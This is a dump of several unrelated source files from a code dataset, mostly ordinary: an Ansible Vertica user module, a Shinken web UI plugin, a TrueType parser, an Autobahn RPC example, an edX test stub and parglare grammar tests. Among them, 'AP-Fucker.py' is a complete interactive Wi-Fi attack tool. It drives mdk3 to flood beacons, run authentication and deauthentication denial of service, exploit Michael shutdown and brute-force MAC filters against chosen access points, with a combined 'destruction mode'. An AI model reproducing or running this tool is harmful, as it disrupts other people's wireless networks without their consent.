user_facts.update(get_user_facts(cursor, user))
return True
else:
changed = False
query_fragments = ["alter user {0}".format(user)]
if locked is not None and locked != (user_facts[user_key]['locked'] == 'True'):
if locked:
state = 'lock'
else:
state = 'unlock'
query_fragments.append("account {0}".format(state))
changed = True
if password and password != user_facts[user_key]['password']:
query_fragments.append("identified by '{0}'".format(password))
changed = True
if ldap:
if ldap != (user_facts[user_key]['expired'] == 'True'):
query_fragments.append("password expire")
changed = True
elif expired is not None and expired != (user_facts[user_key]['expired'] == 'True'):
if expired:
query_fragments.append("password expire")
changed = True
else:
raise NotSupportedError("Unexpiring user password is not supported.")
if profile and profile != user_facts[user_key]['profile']:
query_fragments.append("profile {0}".format(profile))
changed = True
if resource_pool and resource_pool != user_facts[user_key]['resource_pool']:
query_fragments.append("resource pool {0}".format(resource_pool))
if user_facts[user_key]['resource_pool'] != 'general':
cursor.execute("revoke usage on resource pool {0} from {1}".format(
user_facts[user_key]['resource_pool'], user))
if resource_pool != 'general':
cursor.execute("grant usage on resource pool {0} to {1}".format(
resource_pool, user))
changed = True
if changed:
cursor.execute(' '.join(query_fragments))
if roles and (cmp(sorted(roles), sorted(user_facts[user_key]['roles'])) != 0 or \
cmp(sorted(roles), sorted(user_facts[user_key]['default_roles'])) != 0):
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], roles)
changed = True
if changed:
user_facts.update(get_user_facts(cursor, user))
return changed
def absent(user_facts, cursor, user, roles):
user_key = user.lower()
if user_key in user_facts:
update_roles(user_facts, cursor, user,
user_facts[user_key]['roles'], user_facts[user_key]['default_roles'], [])
try:
cursor.execute("drop user {0}".format(user_facts[user_key]['name']))
except pyodbc.Error:
raise CannotDropError("Dropping user failed due to dependencies.")
del user_facts[user_key]
return True
else:
return False
# module logic
def main():
module = AnsibleModule(
argument_spec=dict(
user=dict(required=True, aliases=['name']),
profile=dict(default=None),
resource_pool=dict(default=None),
password=dict(default=None),
expired=dict(type='bool', default=None),
ldap=dict(type='bool', default=None),
roles=dict(default=None, aliases=['role']),
state=dict(default='present', choices=['absent', 'present', 'locked']),
db=dict(default=None),
cluster=dict(default='localhost'),
port=dict(default='5433'),
login_user=dict(default='dbadmin'),
login_password=dict(default=None),
), supports_check_mode = True)
if not pyodbc_found:
module.fail_json(msg="The python pyodbc module is required.")
user = module.params['user']
profile = module.params['profile']
if profile:
profile = profile.lower()
resource_pool = module.params['resource_pool']
if resource_pool:
resource_pool = resource_pool.lower()
password = module.params['password']
expired = module.params['expired']
ldap = module.params['ldap']
roles = []
if module.params['roles']:
roles = module.params['roles'].split(',')
roles = filter(None, roles)
state = module.params['state']
if state == 'locked':
locked = True
else:
locked = False
db = ''
if module.params['db']:
db = module.params['db']
changed = False
try:
dsn = (
"Driver=Vertica;"
"Server={0};"
"Port={1};"
"Database={2};"
"User={3};"
"Password={4};"
"ConnectionLoadBalance={5}"
).format(module.params['cluster'], module.params['port'], db,
module.params['login_user'], module.params['login_password'], 'true')
db_conn = pyodbc.connect(dsn, autocommit=True)
cursor = db_conn.cursor()
except Exception:
e = get_exception()
module.fail_json(msg="Unable to connect to database: {0}.".format(e))
try:
user_facts = get_user_facts(cursor)
if module.check_mode:
changed = not check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles)
elif state == 'absent':
try:
changed = absent(user_facts, cursor, user, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
elif state in ['present', 'locked']:
try:
changed = present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
except NotSupportedError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except CannotDropError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except SystemExit:
# avoid catching this on python 2.4
raise
except Exception:
e = get_exception()
module.fail_json(msg=e)
module.exit_json(changed=changed, user=user, ansible_facts={'vertica_users': user_facts})
if __name__ == '__main__':
main()
| gpl-3.0 | 1,226,154,136,544,494,800 | 36.057935 | 98 | 0.60488 | false |
baloo/shinken | shinken/webui/plugins/flow/flow.py | 1 | 3289 | ### Will be populated by the UI with it's own value
app = None
import time
from shinken.webui.bottle import redirect
from shinken.modules.webui_broker.helper import hst_srv_sort
from shinken.util import safe_print
try:
import json
except ImportError:
# For old Python version, load
# simple json (it can be hard json?! It's 2 functions guy!)
try:
import simplejson as json
except ImportError:
print "Error : you need the json or simplejson module"
raise
# Get the div for each element
def get_div(elt):
icon = app.helper.get_icon_state(elt)
stars = ''
for i in range(2, elt.business_impact):
stars += '''<div class="criticity-inpb-icon-%d">
<img src="/static/images/star.png">
</div>''' % (i-1)
lnk = app.helper.get_link_dest(elt)
button = app.helper.get_button('', img='/static/images/search.png')
button_recheck = '''<a href="#" onclick="recheck_now('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Recheck', img='/static/images/delay.gif'))
button_ack = '''<a href="#" onclick="acknowledge('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Ack', img='/static/images/wrench.png'))
pulse = ''
if elt.is_problem or (elt.state_id != 0 and elt.business_impact > 2):
pulse = '<span class="wall-pulse pulse" title=""></span>'
s = """
%s
%s
<div class="item-icon">
<img class="wall-icon" src="%s"></img>
</div>
<div class="item-text">
<span class="state_%s">%s %s</span>
</div>
<div class="item-button">
<a href="%s">%s</a>
</div>
<div class="recheck-button">
%s
</div>
<div class="ack-button">
%s
</div>
""" % (stars, pulse, icon, elt.state.lower(), elt.state, elt.get_full_name(), lnk, button, button_recheck, button_ack)
s = s.encode('utf8', 'ignore')
return s
# Our page
def get_page():
# First we look for the user sid
# so we bail out if it's a false one
user = app.get_user_auth()
if not user:
redirect("/user/login")
all_imp_impacts = app.datamgr.get_important_elements()
all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts = app.datamgr.get_services()#important_elements()
impacts = []
for imp in all_imp_impacts:
safe_print("FIND A BAD SERVICE IN IMPACTS", imp.get_dbg_name())
d = {'name' : imp.get_full_name().encode('utf8', 'ignore'),
"title": "My Image 3", "thumb": "/static/images/state_flapping.png", "zoom": "/static/images/state_flapping.png",
"html" : get_div(imp)}
impacts.append(d)
# Got in json format
#j_impacts = json.dumps(impacts)
# print "Return impact in json", j_impacts
all_pbs = app.datamgr.get_all_problems()
now = time.time()
# Get only the last 10min errors
all_pbs = [pb for pb in all_pbs if pb.last_state_change > now - 600]
# And sort it
all_pbs.sort(hst_srv_sort)#sort_by_last_state_change)
return {'app' : app, 'user' : user, 'impacts' : impacts, 'problems' : all_pbs}
pages = {get_page : { 'routes' : ['/flow/'], 'view' : 'flow', 'static' : True}}
| agpl-3.0 | 9,178,488,943,381,101,000 | 32.222222 | 163 | 0.585892 | false |
brototyp/CouchPotato | library/hachoir_parser/misc/ttf.py | 95 | 9417 | """
TrueType Font parser.
Documents:
- "An Introduction to TrueType Fonts: A look inside the TTF format"
written by "NRSI: Computers & Writing Systems"
http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&item_id=IWS-Chapter08
Author: Victor Stinner
Creation date: 2007-02-08
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet, ParserError,
UInt16, UInt32, Bit, Bits,
PaddingBits, NullBytes,
String, RawBytes, Bytes, Enum,
TimestampMac32)
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.text_handler import textHandler, hexadecimal, filesizeHandler
MAX_NAME_COUNT = 300
MIN_NB_TABLE = 3
MAX_NB_TABLE = 30
DIRECTION_NAME = {
0: u"Mixed directional",
1: u"Left to right",
2: u"Left to right + neutrals",
-1: u"Right to left",
-2: u"Right to left + neutrals",
}
NAMEID_NAME = {
0: u"Copyright notice",
1: u"Font family name",
2: u"Font subfamily name",
3: u"Unique font identifier",
4: u"Full font name",
5: u"Version string",
6: u"Postscript name",
7: u"Trademark",
8: u"Manufacturer name",
9: u"Designer",
10: u"Description",
11: u"URL Vendor",
12: u"URL Designer",
13: u"License Description",
14: u"License info URL",
16: u"Preferred Family",
17: u"Preferred Subfamily",
18: u"Compatible Full",
19: u"Sample text",
20: u"PostScript CID findfont name",
}
PLATFORM_NAME = {
0: "Unicode",
1: "Macintosh",
2: "ISO",
3: "Microsoft",
4: "Custom",
}
CHARSET_MAP = {
# (platform, encoding) => charset
0: {3: "UTF-16-BE"},
1: {0: "MacRoman"},
3: {1: "UTF-16-BE"},
}
class TableHeader(FieldSet):
def createFields(self):
yield String(self, "tag", 4)
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield UInt32(self, "offset")
yield filesizeHandler(UInt32(self, "size"))
def createDescription(self):
return "Table entry: %s (%s)" % (self["tag"].display, self["size"].display)
class NameHeader(FieldSet):
def createFields(self):
yield Enum(UInt16(self, "platformID"), PLATFORM_NAME)
yield UInt16(self, "encodingID")
yield UInt16(self, "languageID")
yield Enum(UInt16(self, "nameID"), NAMEID_NAME)
yield UInt16(self, "length")
yield UInt16(self, "offset")
def getCharset(self):
platform = self["platformID"].value
encoding = self["encodingID"].value
try:
return CHARSET_MAP[platform][encoding]
except KeyError:
self.warning("TTF: Unknown charset (%s,%s)" % (platform, encoding))
return "ISO-8859-1"
def createDescription(self):
platform = self["platformID"].display
name = self["nameID"].display
return "Name record: %s (%s)" % (name, platform)
def parseFontHeader(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "font_maj_ver", "Font major version")
yield UInt16(self, "font_min_ver", "Font minor version")
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield Bytes(self, "magic", 4, r"Magic string (\x5F\x0F\x3C\xF5)")
if self["magic"].value != "\x5F\x0F\x3C\xF5":
raise ParserError("TTF: invalid magic of font header")
# Flags
yield Bit(self, "y0", "Baseline at y=0")
yield Bit(self, "x0", "Left sidebearing point at x=0")
yield Bit(self, "instr_point", "Instructions may depend on point size")
yield Bit(self, "ppem", "Force PPEM to integer values for all")
yield Bit(self, "instr_width", "Instructions may alter advance width")
yield Bit(self, "vertical", "e laid out vertically?")
yield PaddingBits(self, "reserved[]", 1)
yield Bit(self, "linguistic", "Requires layout for correct linguistic rendering?")
yield Bit(self, "gx", "Metamorphosis effects?")
yield Bit(self, "strong", "Contains strong right-to-left glyphs?")
yield Bit(self, "indic", "contains Indic-style rearrangement effects?")
yield Bit(self, "lossless", "Data is lossless (Agfa MicroType compression)")
yield Bit(self, "converted", "Font converted (produce compatible metrics)")
yield Bit(self, "cleartype", "Optimised for ClearType")
yield Bits(self, "adobe", 2, "(used by Adobe)")
yield UInt16(self, "unit_per_em", "Units per em")
if not(16 <= self["unit_per_em"].value <= 16384):
raise ParserError("TTF: Invalid unit/em value")
yield UInt32(self, "created_high")
yield TimestampMac32(self, "created")
yield UInt32(self, "modified_high")
yield TimestampMac32(self, "modified")
yield UInt16(self, "xmin")
yield UInt16(self, "ymin")
yield UInt16(self, "xmax")
yield UInt16(self, "ymax")
# Mac style
yield Bit(self, "bold")
yield Bit(self, "italic")
yield Bit(self, "underline")
yield Bit(self, "outline")
yield Bit(self, "shadow")
yield Bit(self, "condensed", "(narrow)")
yield Bit(self, "expanded")
yield PaddingBits(self, "reserved[]", 9)
yield UInt16(self, "lowest", "Smallest readable size in pixels")
yield Enum(UInt16(self, "font_dir", "Font direction hint"), DIRECTION_NAME)
yield Enum(UInt16(self, "ofst_format"), {0: "short offsets", 1: "long"})
yield UInt16(self, "glyph_format", "(=0)")
def parseNames(self):
# Read header
yield UInt16(self, "format")
if self["format"].value != 0:
raise ParserError("TTF (names): Invalid format (%u)" % self["format"].value)
yield UInt16(self, "count")
yield UInt16(self, "offset")
if MAX_NAME_COUNT < self["count"].value:
raise ParserError("Invalid number of names (%s)"
% self["count"].value)
# Read name index
entries = []
for index in xrange(self["count"].value):
entry = NameHeader(self, "header[]")
yield entry
entries.append(entry)
# Sort names by their offset
entries.sort(key=lambda field: field["offset"].value)
# Read name value
last = None
for entry in entries:
# Skip duplicates values
new = (entry["offset"].value, entry["length"].value)
if last and last == new:
self.warning("Skip duplicate %s %s" % (entry.name, new))
continue
last = (entry["offset"].value, entry["length"].value)
# Skip negative offset
offset = entry["offset"].value + self["offset"].value
if offset < self.current_size//8:
self.warning("Skip value %s (negative offset)" % entry.name)
continue
# Add padding if any
padding = self.seekByte(offset, relative=True, null=True)
if padding:
yield padding
# Read value
size = entry["length"].value
if size:
yield String(self, "value[]", size, entry.description, charset=entry.getCharset())
padding = (self.size - self.current_size) // 8
if padding:
yield NullBytes(self, "padding_end", padding)
class Table(FieldSet):
TAG_INFO = {
"head": ("header", "Font header", parseFontHeader),
"name": ("names", "Names", parseNames),
}
def __init__(self, parent, name, table, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.table = table
tag = table["tag"].value
if tag in self.TAG_INFO:
self._name, self._description, self.parser = self.TAG_INFO[tag]
else:
self.parser = None
def createFields(self):
if self.parser:
for field in self.parser(self):
yield field
else:
yield RawBytes(self, "content", self.size//8)
def createDescription(self):
return "Table %s (%s)" % (self.table["tag"].value, self.table.path)
class TrueTypeFontFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "ttf",
"category": "misc",
"file_ext": ("ttf",),
"min_size": 10*8, # FIXME
"description": "TrueType font",
}
def validate(self):
if self["maj_ver"].value != 1:
return "Invalid major version (%u)" % self["maj_ver"].value
if self["min_ver"].value != 0:
return "Invalid minor version (%u)" % self["min_ver"].value
if not (MIN_NB_TABLE <= self["nb_table"].value <= MAX_NB_TABLE):
return "Invalid number of table (%u)" % self["nb_table"].value
return True
def createFields(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "nb_table")
yield UInt16(self, "search_range")
yield UInt16(self, "entry_selector")
yield UInt16(self, "range_shift")
tables = []
for index in xrange(self["nb_table"].value):
table = TableHeader(self, "table_hdr[]")
yield table
tables.append(table)
tables.sort(key=lambda field: field["offset"].value)
for table in tables:
padding = self.seekByte(table["offset"].value, null=True)
if padding:
yield padding
size = table["size"].value
if size:
yield Table(self, "table[]", table, size=size*8)
padding = self.seekBit(self.size, null=True)
if padding:
yield padding
| gpl-3.0 | 7,273,182,620,738,885,000 | 32.99639 | 94 | 0.605713 | false |
ahmedbodi/AutobahnPython | examples/twisted/wamp1/rpc/simple/example2/server.py | 17 | 3564 | ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys, math
from twisted.python import log
from twisted.internet import reactor, defer
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import listenWS
from autobahn.wamp1.protocol import exportRpc, \
WampServerFactory, \
WampServerProtocol
class Calc:
"""
A simple calc service we will export for Remote Procedure Calls (RPC).
All you need to do is use the @exportRpc decorator on methods
you want to provide for RPC and register a class instance in the
server factory (see below).
The method will be exported under the Python method name, or
under the (optional) name you can provide as an argument to the
decorator (see asyncSum()).
"""
@exportRpc
def add(self, x, y):
return x + y
@exportRpc
def sub(self, x, y):
return x - y
@exportRpc
def square(self, x):
MAX = 1000
if x > MAX:
## raise a custom exception
raise Exception("http://example.com/error#number_too_big",
"%d too big for me, max is %d" % (x, MAX),
MAX)
return x * x
@exportRpc
def sum(self, list):
return reduce(lambda x, y: x + y, list)
@exportRpc
def pickySum(self, list):
errs = []
for i in list:
if i % 3 == 0:
errs.append(i)
if len(errs) > 0:
raise Exception("http://example.com/error#invalid_numbers",
"one or more numbers are multiples of 3",
errs)
return reduce(lambda x, y: x + y, list)
@exportRpc
def sqrt(self, x):
return math.sqrt(x)
@exportRpc("asum")
def asyncSum(self, list):
## Simulate a slow function.
d = defer.Deferred()
reactor.callLater(3, d.callback, self.sum(list))
return d
class SimpleServerProtocol(WampServerProtocol):
"""
Demonstrates creating a simple server with Autobahn WebSockets that
responds to RPC calls.
"""
def onSessionOpen(self):
# when connection is established, we create our
# service instances ...
self.calc = Calc()
# .. and register them for RPC. that's it.
self.registerForRpc(self.calc, "http://example.com/simple/calc#")
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'debug':
log.startLogging(sys.stdout)
debug = True
else:
debug = False
factory = WampServerFactory("ws://localhost:9000", debugWamp = debug)
factory.protocol = SimpleServerProtocol
factory.setProtocolOptions(allowHixie76 = True)
listenWS(factory)
webdir = File(".")
web = Site(webdir)
reactor.listenTCP(8080, web)
reactor.run()
| apache-2.0 | 342,293,789,144,472,200 | 27.741935 | 79 | 0.600168 | false |
sameetb-cuelogic/edx-platform-test | common/djangoapps/enrollment/tests/fake_data_api.py | 26 | 3120 | """
A Fake Data API for testing purposes.
"""
import copy
import datetime
_DEFAULT_FAKE_MODE = {
"slug": "honor",
"name": "Honor Code Certificate",
"min_price": 0,
"suggested_prices": "",
"currency": "usd",
"expiration_datetime": None,
"description": None
}
_ENROLLMENTS = []
_COURSES = []
# pylint: disable=unused-argument
def get_course_enrollments(student_id):
"""Stubbed out Enrollment data request."""
return _ENROLLMENTS
def get_course_enrollment(student_id, course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_enrollment(student_id, course_id)
def create_course_enrollment(student_id, course_id, mode='honor', is_active=True):
"""Stubbed out Enrollment creation request. """
return add_enrollment(student_id, course_id, mode=mode, is_active=is_active)
def update_course_enrollment(student_id, course_id, mode=None, is_active=None):
"""Stubbed out Enrollment data request."""
enrollment = _get_fake_enrollment(student_id, course_id)
if enrollment and mode is not None:
enrollment['mode'] = mode
if enrollment and is_active is not None:
enrollment['is_active'] = is_active
return enrollment
def get_course_enrollment_info(course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_course_info(course_id)
def _get_fake_enrollment(student_id, course_id):
"""Get an enrollment from the enrollments array."""
for enrollment in _ENROLLMENTS:
if student_id == enrollment['student'] and course_id == enrollment['course']['course_id']:
return enrollment
def _get_fake_course_info(course_id):
"""Get a course from the courses array."""
for course in _COURSES:
if course_id == course['course_id']:
return course
def add_enrollment(student_id, course_id, is_active=True, mode='honor'):
"""Append an enrollment to the enrollments array."""
enrollment = {
"created": datetime.datetime.now(),
"mode": mode,
"is_active": is_active,
"course": _get_fake_course_info(course_id),
"student": student_id
}
_ENROLLMENTS.append(enrollment)
return enrollment
def add_course(course_id, enrollment_start=None, enrollment_end=None, invite_only=False, course_modes=None):
"""Append course to the courses array."""
course_info = {
"course_id": course_id,
"enrollment_end": enrollment_end,
"course_modes": [],
"enrollment_start": enrollment_start,
"invite_only": invite_only,
}
if not course_modes:
course_info['course_modes'].append(_DEFAULT_FAKE_MODE)
else:
for mode in course_modes:
new_mode = copy.deepcopy(_DEFAULT_FAKE_MODE)
new_mode['slug'] = mode
course_info['course_modes'].append(new_mode)
_COURSES.append(course_info)
def reset():
"""Set the enrollments and courses arrays to be empty."""
global _COURSES # pylint: disable=global-statement
_COURSES = []
global _ENROLLMENTS # pylint: disable=global-statement
_ENROLLMENTS = []
| agpl-3.0 | -4,717,372,604,753,869,000 | 28.714286 | 108 | 0.648718 | false |
PrinceShaji/StreamBox | TestCodes/examplecodes/AP-Fucker.py | 1 | 9270 |
#!/usr/bin/env python
# -*- coding: Utf-8 -*-
#
# WIRELESS ACCESS POINT FUCKER
# Interactive, Multifunction, Destruction Mode Included
#
# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
#
# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
# Prerequisites: Have mdk3 installed
#
__app__ = "AP-Fucker"
__version__ = "0.5"
__author__ = "MatToufoutu"
### IMPORTS
from sys import stdout
from sys import exit as sysexit
from os import system, remove, path
from commands import getoutput
from threading import Thread
from time import sleep, ctime
### MDK3 THREADED ATTACKS CLASS
class Mdk3(Thread):
def __init__(self, attack, attack_options):
Thread.__init__(self)
self.attack = attack
self.iface = attack_options[0]
self.essid = attack_options[1]
self.bssid = attack_options[2]
self.chan = attack_options[3]
self.log = "apfucker.log"
self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
"M":self.mich, "W":self.wids, "C":self.brutmac}
def bflood(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
def ados(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
out.close()
print("\n Launching Auth DoS against %s " % (self.bssid))
sleep(2)
system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
def amok(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
out.close()
print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
sleep(2)
system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
def mich(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
out.close()
print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
def wids(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
def brutmac(self):
global runanim
runanim = True
out = open(self.log, "a")
out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
sleep(2)
macfound = getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
runanim = False
sleep(1)
print; print
for line in macfound:
print(line)
out.write("\n"+line)
out.close()
print
sysexit(0)
def run(self):
global runanim
runanim = True
self.modes[self.attack]()
runanim = False
### AUXILIARY FUNCTIONS
## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
for line in getoutput("iwconfig "+iface).splitlines():
if "Mode:Monitor" in line:
return True
return False
## CHECK IF BSSID IS VALID
def check_mac(ap):
if len(ap) != 17 or ap.count(':') != 5:
return False
macchar = "0123456789abcdef:"
for c in ap.lower():
if macchar.find(c) == -1:
return False
return True
## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
if chan.isdigit():
channel = int(chan)
if not channel in range(1, int(getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
return False
else:
return False
return True
## CLEAN EXIT
def clean_exit():
print;print
print("\nAction aborted by user. Exiting now")
for pid in getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
system("kill -9 "+pid)
print("Hope you enjoyed it ;-)")
sleep(2)
system("clear")
sysexit(0)
## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
try:
stdout.write("\r | "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r / "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r-- "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r \\ "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r | "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r / "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r-- "+mess)
stdout.flush()
sleep(0.15)
stdout.write("\r \\ "+mess)
stdout.flush()
sleep(0.15)
except KeyboardInterrupt:
clean_exit()
### MAIN APP
try:
import psyco
psyco.full()
except ImportError:
pass
attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
attack_opt = []
if getoutput("whoami") != "root":
print("This script must be run as root !")
sysexit(0)
try:
system("clear")
print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
print("""Choose your Mode:
\t - (B)eacon flood
\t - (A)uth DoS
\t - (W)ids confusion
\t - (D)isassociation 'AmoK Mode'
\t - (M)ichael shutdown exploitation
\t - MA(C) Filter Brute-Forcer
\t - Des(T)ruction mode (USE WITH CAUTION)\n""")
## GET MODE
while 1:
mode = raw_input("\n>>> ")
if mode.upper() not in attackAvail:
print(" '%s' is not a valid mode !" % mode)
else:
break
## GET INTERFACE
while 1:
iface = raw_input("\nMonitor interface to use: ")
if check_mon(iface):
attack_opt.append(iface)
break
else:
print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
## GET ESSID
if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
else:
attack_opt.append(None)
## GET BSSID
if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
while 1:
bssid = raw_input("\nTarget BSSID: ")
if check_mac(bssid):
attack_opt.append(bssid)
break
else:
print("Invalid BSSID, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## GET CHANNEL
if mode.upper() != "C":
while 1:
channel = raw_input("\nTarget channel: ")
if check_chan(iface, channel):
attack_opt.append(channel)
break
else:
print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## LAUNCH SELECTED ATTACK
if path.exists("apfucker.log"):
remove("apfucker.log")
if mode.upper() != "T":
system('clear')
Mdk3(mode.upper(), attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
else:
system('clear')
print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
print(" You've choosen DESTRUCTION MODE")
print(" Using this mode may harm your WiFi card, use it at your own risks.")
validate = raw_input(" Do you wish to continue? (y/N): ")
if validate.upper() != "Y":
print(" Ok, exiting now")
sysexit(0)
else:
out = open("apfucker.log","a")
out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
out.close()
print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
print(" Please be kind with your neighbours xD")
##wids not implemented: may raise segfault
##appears to be an internal mdk3 issue when running multiple attacks
for atk in ("B", "A", "D", "M"):
Mdk3(atk, attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
clean_exit()
| mit | -1,530,642,497,631,623,200 | 33.206642 | 163 | 0.547033 | false |
igordejanovic/parglare | tests/func/grammar/test_grammar.py | 1 | 10211 | # -*- coding: utf-8 -*-
import pytest
from parglare import Parser, Grammar
from parglare.grammar import ASSOC_LEFT, ASSOC_RIGHT, DEFAULT_PRIORITY
from parglare.exceptions import GrammarError, ParseError
def test_single_terminal():
"""
Test that grammar may be just a single terminal.
"""
grammar = r"""
S: A;
terminals
A: "a";
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('a')
assert result == 'a'
grammar = r"""
S: A;
terminals
A: /\d+/;
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('23')
assert result == '23'
def test_undefined_grammar_symbol():
"Tests that undefined grammar symbols raises errors."
grammar = """
S: A B;
A: "a" | B;
B: id;
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'Unknown symbol' in str(e.value)
assert 'id' in str(e.value)
def test_multiple_terminal_definition():
grammar = """
S: A A;
terminals
A: "a";
A: "b";
"""
with pytest.raises(GrammarError,
match=r'.*Multiple definitions of terminal rule.*'):
Grammar.from_string(grammar)
def test_reserved_symbol_names():
"""
Test that reserved symbol names can't be used.
"""
grammar = """
S: STOP "First";
STOP: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
grammar = """
S: EMPTY "First";
EMPTY: "stop";
"""
with pytest.raises(GrammarError) as e:
Grammar.from_string(grammar)
assert 'is reserved' in str(e.value)
def test_assoc_prior():
"""Test that associativity and priority can be defined for productions and
terminals.
"""
grammar = r"""
E: E '+' E {left, 1};
E: E '*' E {2, left};
E: E '^' E {right};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
# Repeat the same but for alternative keywords "shift" and "reduce"
grammar = r"""
E: E '+' E {reduce, 1};
E: E '*' E {2, reduce};
E: E '^' E {shift};
E: id;
terminals
id: /\d+/;
"""
g = Grammar.from_string(grammar)
assert g.productions[1].prior == 1
assert g.productions[1].assoc == ASSOC_LEFT
assert g.productions[3].assoc == ASSOC_RIGHT
assert g.productions[3].prior == DEFAULT_PRIORITY
assert g.productions[3].prior == DEFAULT_PRIORITY
def test_terminal_priority():
"Terminals might define priority which is used for lexical disambiguation."
grammar = """
S: A | B;
A: 'a' {15};
B: 'b';
"""
g = Grammar.from_string(grammar)
for t in g.terminals.values():
